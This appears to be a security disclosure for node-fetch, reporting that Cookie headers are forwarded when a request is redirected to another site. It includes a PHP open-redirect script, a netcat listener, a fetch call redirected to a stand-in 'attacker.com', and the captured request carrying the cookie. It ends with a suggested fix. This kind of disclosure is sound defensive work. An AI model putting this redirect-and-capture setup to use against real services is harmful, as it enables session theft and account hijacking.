Cookie header leaked to third party site and it allow to hijack victim account
When fetching a remote url with Cookie if it get Location
response header then it will follow that url and try to fetch that url with provided cookie . So cookie is leaked here to thirdparty.
Ex: you try to fetch example.com
with cookie and if it get redirect url to attacker.com
then it fetch that redirect url with provided cookie .
So, Cookie of example.com
is leaked to attacker.com
.
Cookie is standard way to authentication into webapp and you should not leak to other site .
All browser follow same-origin-policy so that when redirect happen browser does not send cookie of example.com
to attacker.com
.
if you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it will redirect to http://attacker.com:8182/ .
First setup a webserver and a netcat listner
//redirect.php
<?php
$url=$_GET["url"];
header("Location: $url");
/* Make sure that code below does not get executed when we redirect. */
exit;
?>
nc -lnvp 8182
run bellow code
import fetch from 'node-fetch';
const body = {a: 1};
const response = await fetch('http://mysite.com/redirect.php?url=http://attacker.com:8182/dd', {
method: 'post',
body: JSON.stringify(body),
headers: {'Cookie': 'asd=ad'}
});
const data = await response.json();
console.log(data);
response received in attacker netcat
GET /dd HTTP/1.1
Cookie: asd=ad
Content-Type: text/plain;charset=UTF-8
Accept: */*
User-Agent: node-fetch/1.0 (+https://github.com/bitinn/node-fetch)
Accept-Encoding: gzip,deflate
Connection: close
Host: localhost:8182
See here in this response cookie is leaked to thirdparty site attacker.com.
So, here i provided cookie for mysite.com but does to redirect it leaks to thirdparty site attacker.com
If provided url domain and redirect url domain is same then you can only send cookie/authorization header to redirected url . But if the both domain not same then its a third party site which will be redirected, so you dont need to send Cookie/Authorization header.